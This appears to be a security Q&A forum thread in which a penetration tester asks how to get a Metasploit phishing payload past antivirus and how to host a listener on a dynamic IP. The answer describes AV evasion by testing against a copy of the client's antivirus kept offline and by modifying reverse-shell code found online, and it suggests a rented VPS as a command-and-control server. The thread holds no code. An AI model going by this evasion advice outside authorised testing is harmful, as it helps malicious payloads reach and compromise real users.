-1

So I am part of the team where in we have to conduct a penetration testing assignment for our client. Basically what he wants from us is to show how we can get into their system with the help of phishing, and for the POC he wants us to show the listener which we set up.

  • My understanding here is to create an exploit with metasploit -> set up the listener -> send the exploit to users -> make them click the attachment = Boom, we get the shell.

Idea wise this is correct but I am stuck at the execution.

  • How do I encode my exploit so that I doesn't get detected by the AV. here I have tried the obvious .exe approach which gets detected and deleted immediately. similarly I tried binding it with a pdf which also got detected by the AV.
  • Secondly I am using dynamic IP. In-order to to get it working I tried no-ip which has changed to now-dns and created a host name against my ip. I am not clear to what do I do next, I entered the host name in the listener ip, but how will I get the shell or the listener.
  • Suggestions for the ideal exploit in this scenario - are there any other approaches that I can consider in this case which could help in getting the desired result.

Feel free to correct me if I am wrong at anyplace. I am new in this area so could have missed few things.

user1299086
  • 29
  • 1
  • Depends on the defence mechanism: macro's, client side exploit (for example pdf and vulnerable pdf viewer), website that exploits a client side vulnerability, having the user install a plugin and try to escalate privilege... – Silver Jan 10 '17 at 12:54

1 Answers1

1

About avoiding anti-virus: It's not as simple as you may think, but here's some guidelines. First, you need to figure out which anti-virus they use. Knowing that, create a virtual machine with the same OS and Anti-Virus solution the client has, that will be your "testing environment" (make sure to keep this test environment disconnected from the internet, to ensure the solution will not generate a new signature and upload to the vendor). Having it done, you can start to play with the meterpreter encoders, which in most of the cases will be detected by the AV anyway. What I do recommend is writing your own exploit, so most of the anti-virus solutions that doesn't have sandboxing capabilities will not detect. What I usually do is googling a code similar to the exploit we want (example, searching for a reverse-shell code in C) and changing some parts of the code. In this way, any signature-based anti-virus will not detect. You should always test on your testing environment.

About the dynamic IP: If you're part of a team and a serious pentest company, acquire a static IP. You can even get a VPS for $5/month and use it as your "command and control" server. Using solutions like no-ip introduce a high chance of failure.

Ricardo Reimao
  • 687
  • 4
  • 9